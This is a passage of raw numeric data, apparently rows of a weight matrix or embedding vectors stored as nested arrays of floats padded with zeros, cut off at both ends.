0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0282119, 0.655421, -1.92449, -4.4303, -3.76537, 1.63412, -0.512826, 0.559951, -0.436864, 0.283807, -0.0470535, -8.90888, -0.438095, -0.0165175, -0.019949, -0.202189, 0.114961, 0.102691, 0.00820977, -0.152767, 0.908944, -0.0272886, -4.95957, 0.0434976, 0.10557, -0.0287552, 0.0717929, -0.244871, -0.000863109, -0.739313, 0.119551, -0.467674, -2.81641, -0.0876342, -0.00487859, 0.698549, 0.928057, -1.0584, 0.145505, 1.04297, -0.0467779, -1.13003, 0.724863, 1.46841, -5.91343, -0.0759377, -1.92188, -0.00735915, -0.165947, -3.82198, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.242008, -0.0143518, 0.829281, -0.962464, 0.0598716, 0.00429408, 0.295746, 0.156866, 0.103791, -0.255729, -0.430983, 0.0474375, -0.742686, -0.0068865, 0.00225077, -0.110512, -0.71115, 0.0787291, 0.150878, 0.00790266, -0.133806, 0.0156908, -0.320961, 0.407703, 0.44077, -1.042, -0.375426, -0.0262698, 0.817547, -0.507463, -0.122921, -0.105363, 0.121477, -0.239359, -0.426859, 0.275346, 0.277036, 0.117458, 0.100358, 0.239277, -0.0684942, 0.282144, 0.771653, -0.704539, 0.219761, -0.300022, 0.791541, 0.0346975, 0.269311, -0.428704, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.684779, -1.23925, -0.267095, 1.61387, 0.142103, -0.921054, -0.45163, -1.28687, -1.08755, 0.476307, 0.562988, -1.35387, -0.120373, -1.4514, 0.0106518, 0.0503995, -3.21986, 0.225937, -1.32647, -0.599701, -0.386049, 0.317367, -0.693967, 0.628627, 1.40369, -0.778355, -0.861718, 0.412826, -1.35889, 0.990398, -1.39497, 0.307451, 0.198362, 0.410512, -0.333451, -1.0943, 
1.04271, -0.871418, 0.239592, -4.30839, -0.255597, -1.11285, -0.598663, -0.939516, 0.128542, 0.6008, -0.771214, 0.0468901, 0.399295, -1.13734, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.121418, 0.0887225, 0.0371437, 0.118398, -0.193567, -0.485059, -0.166727, -0.086693, 0.889451, -0.137104, 0.0602432, -0.434929, 0.0403237, -0.205467, 0.0486817, -0.00918316, -0.236275, -0.0637436, 0.0847122, -0.0280539, -0.0872957, 0.0251945, -0.00415574, -0.10905, 0.321388, -0.17211, -0.302408, 0.0503998, 0.0394051, -0.207033, -0.0905195, 0.237472, 0.0400698, -0.209811, -0.0619867, -0.21807, 0.127765, 0.112882, 0.00171291, -0.11847, -0.0661039, 0.0295239, 0.455934, -0.296326, -0.182833, -0.00336458, 0.183689, 0.0393237, 0.173754, 0.0867553, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0371726, 0.0334255, 0.161873, -0.200124, 0.0542473, -2.00254, 0.218968, -0.116694, -0.0584859, 0.071341, -0.351633, 0.594386, 0.129516, -0.241845, 0.00929755, 0.00307103, 0.119392, 0.105445, 0.24893, 0.571974, 0.253325, -0.0334011, -0.0632295, 0.149691, 0.472255, 0.140529, 0.156288, -0.0179687, 0.352836, 1.39679, -5.10451, -0.706279, -0.481158, 0.0409242, 0.00194056, -0.501476, 0.0368214, 0.38285, 0.0885774, -0.156656, 0.086926, -0.649707, -0.266136, 0.0716584, 0.10027, 0.0243436, -0.172501, 0.0417889, -0.0181834, -0.0945115, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.525492, 
-0.297079, 0.669968, -0.229898, -0.00759089, -0.538653, -0.0594109, 1.11823, -2.04004, 0.666147, 0.116758, -0.171682, -1.24497, -1.80744, 0.00690396, 0.128635, 0.24266, 0.174364, 1.08595, 1.63061, -0.639053, -0.21702, -0.0491286, 0.297638, -0.563711, -0.127201, 0.0292218, -0.859784, 3.72925, -11.6126, 0.944555, -0.892475, 0.622695, -0.0795862, -0.0597896, 0.178346, 0.223332, 0.787762, 0.305543, -0.178452, 0.288511, -0.699318, 0.428386, 0.21143, -1.49987, 0.734354, -0.162341, 0.0240091, -0.402675, 0.293782, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0616888, -0.522319, -0.175403, -0.0572232, -0.295034, 0.847519, 0.641399, 0.265849, 0.160254, 0.133999, 0.100854, -0.129023, 0.371135, -0.324103, 0.0577432, -0.110337, -0.413792, -0.351571, -0.450386, 0.288996, -0.425387, -0.484391, -0.11695, -0.202581, 0.119454, -0.567001, -0.16437, -0.248797, -0.676047, 0.438264, -0.0689069, 0.0412898, -0.0401866, -0.481069, -0.109339, -0.176187, 0.433589, 0.123114, -0.113177, 0.746687, -0.318235, 0.345405, 0.384048, -0.286015, 0.135669, -0.245525, 0.339653, -0.0234591, 0.479016, -0.0245504, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.03333, -0.420223, 0.395815, 0.163183, 0.10879, -0.583208, 0.0209813, -0.184093, -0.0245447, 0.040377, 0.0373998, 0.0559828, 0.259972, 0.352318, 0.00350468, -0.00783364, 0.120631, 0.0725094, 0.0820311, -0.156981, 0.00489784, 0.148705, 0.00142702, 0.111936, 0.340559, 0.0724226, -0.0959207, -0.152691, 0.0844416, 0.279474, -0.925087, 0.00165565, -0.0079441, 0.182121, 0.0668509, -0.467214, 0.0748087, -0.0174181, -0.0756833, -0.285231, 0.0500349, 
-0.107036, -0.402067, 0.148978, 0.266857, 0.146448, -0.116426, 0.00931608, 0.0834037, 0.154813, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.347632, -0.327401, 0.605528, 0.0714051, -0.142411, 0.455937, 0.541103, 0.0210319, -0.0268355, -0.0252585, 0.0554241, -0.193942, -0.19294, 0.387868, 0.0525489, 0.0783566, -0.584597, 0.130106, -0.42158, 0.503848, -0.0926099, -0.114307, -0.0689267, 0.0697529, 0.639038, -0.129007, -0.0843851, -0.497716, -0.0927106, 1.91638, 0.0808919, -0.0645766, 0.0306129, -0.176848, -0.175264, 0.113871, 0.64888, 0.0495647, -0.215063, 0.039443, -0.00478932, 0.110907, -0.356772, -0.238222, -0.0782477, 0.156826, 0.506756, -0.0344773, 0.352656, -0.389609, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.225502, 0.518288, 0.558638, -0.515126, 0.0242073, -0.411341, 0.533368, 0.175902, 0.655053, 0.28547, -0.219699, -0.578468, -0.0843267, -0.501413, -0.0218207, -0.0432255, -1.0852, 0.0502407, -0.78696, 1.11122, 0.0573125, 0.0035622, -0.793858, 0.103274, 0.397639, -0.301453, -0.29745, -0.339079, 0.826933, 1.69057, -0.0982163, 0.282238, 0.162588, -0.208234, -0.0778498, 0.875148, -0.51445, 0.517551, 0.0572592, 0.947806, 0.079075, 0.568983, 0.182329, 0.291328, 0.0767892, 0.141164, 0.552632, -0.0276699, 0.0935139, -0.948284, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [1.15895, -0.082995, -0.524102, 1.97089, -1.27179, 0.548526, 0.343785, -0.396628, 
-1.1918, 0.408974, -2.06459, -0.202667, -0.0633527, -1.19364, 0.0140823, 0.0865772, -4.49103, 1.10932, -2.25927, -0.0323453, -0.744064, -1.11839, -2.42957, 0.84994, 0.554298, -0.670113, 0.370126, -0.220629, -3.85987, -0.82413, 0.211442, -0.303557, -0.116857, -1.29532, -0.732952, -0.100872, 0.693875, 1.19253, -1.39031, -0.227825, -0.696725, 0.504844, -0.990508, -2.96575, -6.15761, 0.533333, -0.560934, -0.00989478, -0.020721, -2.5646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.785951, -0.328681, 0.374446, 1.14356, 1.19847, 2.08369, 0.13618, -0.106309, -0.218635, 0.593345, 0.0391423, 0.903166, -0.947125, -4.92236, 0.0259727, 0.338586, -1.58461, -0.639623, -2.84456, -0.154997, -0.677088, -0.864413, -0.910358, 0.801957, -1.95189, -0.972723, -1.21003, -0.67964, 0.130227, 1.09733, 0.176463, -0.514259, -0.355506, -1.22066, 0.346918, -0.285534, 1.88585, 0.166253, -2.40732, 0.680006, -0.711498, 0.658677, -0.330327, -2.69763, -3.18395, -0.592807, -3.79946, 0.00861641, -0.917362, 1.33944, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.171358, 0.068605, 1.14928, 0.234316, -4.70365, 1.37581, 0.198473, 0.0832273, 0.819678, -0.339479, 0.29573, -1.42371, -0.0113211, 0.536265, -0.00633912, 0.0248133, -0.605547, 0.0247199, -0.469479, -0.661784, 0.228349, 0.0131695, 0.125972, 0.333957, 1.59128, -0.438937, 0.250153, 0.00279078, 0.155318, 2.35161, 0.212905, -0.0443533, -0.361112, -0.534815, -0.0347611, -0.365633, 0.333822, -0.256212, -0.167313, 0.0215808, 0.453897, 0.055597, 0.111809, -1.69443, -0.654436, -0.176017, -0.630552, -0.0443466, 0.223919, -0.259162, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.102436, -0.673777, 0.500149, -0.000298093, 0.0862572, 0.151607, 0.0609693, -0.0618773, 0.0397015, -0.0851725, -0.173721, -0.192096, 0.18284, 0.0272879, -0.00112374, 0.0110674, 0.146052, -0.140955, 0.0437451, 0.143911, 0.0107347, -0.213025, 0.121274, 0.0072306, 0.418219, 0.121135, 0.0574224, -0.0275107, -0.0928366, -0.258989, 0.159599, -0.106149, -0.0585228, 0.105157, 0.0758396, -0.650588, 0.202809, -0.103471, 0.176099, -0.738084, 0.258335, -0.0189874, -0.0924992, 0.2322, -0.126591, -0.178581, 0.00039869, 0.0121514, -0.0831856, 0.2735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0774197, -2.7451, 3.42553, -0.244947, -0.0550098, 0.0815293, 0.495664, -0.0738481, 1.63168, -0.295548, -0.357785, -1.98872, 0.281913, -1.25625, 0.00559982, 0.400101, -1.06225, -0.311013, -0.259961, 0.373959, -0.266409, -0.414128, -0.202667, 0.302865, 1.84527, -0.46585, 0.502156, -0.214565, 0.868845, 5.85983, 0.291085, 0.491398, -0.677802, -0.417188, -0.241922, -2.05606, 0.160784, -0.514009, 0.959477, -1.35559, 1.55644, 1.10811, -0.0487294, -1.6051, -1.47092, -0.574466, -0.927018, -0.0396964, -0.509766, -1.16949, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.046582, -1.36682, 0.634261, 0.172802, 0.109347, -0.994556, -0.0438956, -0.468121, -0.598498, -0.0573191, -0.234072, 0.00892677, -0.0972811, 0.454366, 0.0279091, -0.0208092, 0.210291, 
0.19857, 0.0209483, 0.0418835, 0.150229, 0.329987, 0.0137503, 0.356586, 0.644434, 0.0979573, -0.228731, -0.292858, 0.440465, -0.886745, -0.858721, 0.148076, 0.0352383, 0.248951, 0.0392912, -1.10604, -0.0060463, -0.0823404, -0.0501576, 0.077925, 0.00505458, -0.178437, -0.729749, 0.158685, 0.541662, 0.28571, -0.459632, 0.000601673, 0.233931, 0.174393, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.270405, -0.829149, 1.11758, 0.081221, -0.213066, -1.99366, 0.32159, 0.187833, 0.239155, -0.141487, -0.110184, -0.0375693, -0.106668, -1.18214, -0.00514384, 0.0860025, -0.271834, 0.092741, -0.293195, -0.358042, 0.184654, -0.0020673, 0.0907337, 0.308337, 0.332075, -0.291232, 0.125674, -0.323324, 0.258996, -2.3649, -0.441389, 0.824422, -0.81726, -0.34371, 0.350233, 0.747314, 0.933611, 0.0261506, -3.34746, 1.98303, 0.551805, -0.635112, -0.771644, -0.562914, 0.906002, 0.314297, 0.185499, 0.0344345, -0.38472, -0.437223, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.375018, -0.162315, -0.794787, -0.154189, -0.821326, 1.46429, 0.339034, 0.00510719, -2.10812, 0.572136, 1.78536, -4.56312, 0.384742, 0.442119, 0.00392625, -0.401244, 0.108877, 0.488515, 0.189299, -5.63086, 2.38409, 0.282051, -5.19832, -2.47684, -3.02491, -1.70558, 0.754756, -0.33536, 3.11846, -1.74678, 0.22765, -2.07083, 0.579001, -0.0605323, -0.146367, 0.159787, 3.53479, -2.56463, -0.179804, 0.117535, -4.1629, -3.73295, -0.0620882, 0.991151, -4.80972, -2.07371, 1.64255, -0.012875, -0.255455, -0.0183709, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.105, -1.21279, -0.550133, 0.587044, -0.561154, -1.41796, -0.0151146, -1.68799, 0.416801, 0.491335, 0.335962, 0.657415, -1.6444, -3.11174, 0.01377, 0.536977, -6.21949, 0.631763, -2.62169, -3.26036, -0.931337, -0.611045, -2.70202, 0.910757, 0.309714, -5.28894, 0.0779545, -0.148157, 0.839103, -1.69264, -0.338113, -0.446136, -0.170762, -0.675154, 0.0128516, 0.331579, -1.14823, 1.27874, -1.06469, -0.887167, 1.38621, 0.603451, -0.262868, -1.6475, -3.68424, 0.342282, -0.76182, -0.036202, -1.18587, -1.86409, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.136729, -0.741291, 0.875438, 0.100066, 0.0856765, -0.795403, 0.169397, -0.812254, -1.23112, 0.010297, 0.217381, -0.933369, -0.0702935, 0.013338, 0.00576595, 0.0197882, 0.156158, 0.0407111, -0.198986, -0.224917, 0.336341, 0.0385615, -0.175373, 0.14262, 0.0536719, 0.170501, -0.16552, -0.221205, 0.239687, -1.26225, 0.55195, -0.131762, -0.0310874, 0.266559, -0.157395, -0.707253, 0.514812, -0.210342, -0.330456, -2.36275, 0.201667, -0.20727, -0.739384, 0.0787498, 0.201332, 0.0920677, -0.0304882, 0.0154209, -0.0906038, 0.231536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0179265, 0.110244, -0.184169, -0.051578, -0.469853, -0.715075, 0.346427, 0.35272, 0.133069, -0.390527, -0.101468, 0.0215436, 0.281866, 0.0353315, -0.0175584, -0.0359271, -0.0887463, 0.0230088, 0.205113, 0.111073, -0.329907, 0.0513832, 0.0176968, 0.0737438, -0.385353, -0.0558639, -0.00790535, -0.137637, 
0.786228, -0.0460677, -0.0221184, -0.039664, 0.0593279, -0.109488, 0.310946, 0.0635534, -0.151848, -0.273791, -0.135939, 0.402131, -0.235028, 0.089925, -0.0996393, 0.233086, -0.135764, -0.258497, 0.323289, -0.0524728, 0.278815, 0.00683642, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.375566, 0.247807, 0.831821, -1.12053, -2.11613, -1.0543, 0.283563, 0.61205, -0.0472907, -0.711134, -0.257875, -0.019283, 0.119742, -0.760713, 0.0474915, -0.0474871, 0.0493281, 0.139764, 1.18827, -0.227389, -0.00449563, 0.0456736, 0.0100633, 0.146433, 1.02221, 0.288806, 0.852759, -0.128098, 0.719597, -14.5676, 0.674768, 0.918406, -0.384799, -0.363232, 0.545398, -0.763458, -1.2973, 0.284676, 0.432715, 1.02346, -0.751607, 0.299207, -1.79316, 0.948724, 1.01858, -0.191123, -0.828233, 0.00784095, 0.20676, 0.948392, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00973395, -0.387155, -0.201139, 0.0376793, -0.200139, -0.871053, 0.023216, -0.24786, -0.250708, 0.0745393, 0.369554, -0.0588371, -0.130774, -0.103141, -0.020654, 0.23807, -0.254392, -0.0973468, -0.0332587, -0.598218, -0.137651, -0.243489, 0.0534477, 0.215411, -0.614835, -0.154995, 0.253653, -0.12799, 0.0917628, -1.27155, 0.175456, -1.8799, -0.0521756, -0.0721364, -0.0183898, -0.462464, -0.00538975, 0.252473, 0.283554, -0.0781041, -0.0559165, 0.265362, -0.469358, 0.0279549, 0.0270452, -0.345733, -0.301588, 0.028316, -0.104835, -0.114599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0099361, -0.331624, 0.103244, 0.020101, 0.0195166, -0.626204, -0.0677506, -0.183717, -0.462329, -0.0172648, -0.223951, 0.104575, 0.137081, -0.0645249, -0.0321693, -0.0308815, 0.0913012, 0.0205079, 0.07841, 0.339859, 0.141636, -0.0166765, -0.0522053, 0.06679, 0.361456, 0.0851553, -0.0377332, 0.0843677, -0.0488038, 0.98501, -0.166458, -0.393216, -0.222361, 0.0564164, -0.0125725, 0.0991278, -0.130699, 0.0497134, -0.0816864, -0.06902, 0.017393, -0.300508, -0.103713, 0.0500856, -0.0608127, -0.0131173, 0.0341953, -0.0179829, 0.0364847, 0.0363857, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.542716, -0.284881, -4.30196, -0.277912, 0.114021, 1.07453, -0.871149, -1.18792, 0.829937, 0.0484451, 0.0216223, -0.444421, -2.11127, -0.0648553, -0.0310061, -0.20009, 0.121138, -0.445219, -0.620692, -0.0349218, 0.0398946, -1.52526, 0.137949, 0.0154275, 0.949853, 0.0692926, 0.202533, 0.161118, 0.957416, 0.0032005, -0.996851, 0.53255, 0.0847795, -0.527421, -0.142959, 0.0278537, 0.411195, -0.705621, -0.546245, -1.66322, 0.249793, 0.0822396, -0.355072, -0.593246, -0.974054, -0.0673341, -0.533659, -0.0284988, 0.503378, 0.213124, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0937429, -0.614771, 0.574087, -0.995807, -0.279647, 0.114052, -0.0774811, 0.0590707, -0.476187, 0.0294036, -0.193339, -0.381636, 0.0440694, -0.236013, -0.0314724, 0.0559882, -0.063382, -0.000428932, -0.0699201, -0.0230933, -0.096574, -0.169848, -0.0198844, -0.00418925, 0.133805, -0.0688685, -0.0952642, -0.0445876, -0.110481, 0.548486, -9.38674, 
0.270117, -0.0331187, -0.0189313, -0.00150144, -0.658235, 0.388079, -0.0149576, 0.128336, -0.627472, 0.00717125, 0.0780303, -0.288807, -0.148744, -0.155975, -0.14319, -0.0672474, -0.0190112, -0.103504, -0.320199, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.854777, -0.804487, 3.86719, 0.427518, 0.443657, -0.887188, -0.0599435, -2.72807, 3.73308, -0.247997, 3.25671, -0.915271, -0.813812, 0.473852, 0.00176869, -0.227941, 0.00803855, 0.309495, -1.22599, 2.36919, 0.313498, 0.696946, -0.495688, 0.0548642, 5.03274, 0.314784, -1.28138, -0.795324, -15.2996, 1.46633, 1.88726, 0.217677, 0.156062, 0.390813, 0.57327, -2.48782, -1.56245, 2.00359, 0.329996, 4.87211, -2.94628, -1.28871, -1.07984, 0.728982, -1.54083, 